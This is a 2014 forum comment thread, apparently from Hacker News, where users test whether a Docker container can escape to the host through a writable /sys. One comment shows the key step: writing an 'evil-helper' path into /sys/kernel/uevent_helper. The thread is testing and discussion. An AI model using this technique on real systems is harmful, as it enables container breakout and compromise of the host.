That example is old, but yes it does work, and will continue to work until docke...

kalmi10 · on Oct 8, 2014

I actually tried it on Docker 1.2.0 with the ubuntu:14.04 image.

/sys is already mounted and it is read-only, and it cannot be mounted manually:

  root@07ba8c752195:/# mkdir sys2
  root@07ba8c752195:/# mount -t sysfs sysfs /sys2
  mount: block device sysfs is write-protected, mounting read-only
  mount: cannot mount block device sysfs read-only

Lai0chee · on Oct 8, 2014

BTW: Just one example of a typical Linux namespace vulnerability: http://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-na...

stevekemp · on Oct 8, 2014

I tested this with the busybox image, and received a warning that /sys was already mounted, but the attack then proceded to work as expected.

kalmi10 · on Oct 8, 2014

  kalmi@sylph ~> docker run -t -i busybox:latest
  / # mount -t sysfs sysfs /sys
  mount: permission denied (are you root?)
  / # mkdir sys2
  / # mount -t sysfs sysfs /sys2
  mount: mounting sysfs on /sys2 failed: Permission denied

  kalmi@sylph ~> docker --version
  Docker version 1.2.0, build fa7b24f

  kalmi@sylph ~> uname -r
  Linux sylph 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:42 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

stevekemp · on Oct 9, 2014

We don't need to argue about this, but I see the same permission-denied issue as you, but that doesn't matter.

The /sys is mounted already and reading/writing to it succeeds:

     / # mount -t sysfs sysfs /sys
     mount: permission denied (are you root?)

     / # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper

     / # cat   /sys/kernel/uevent_helper
     /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper

From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..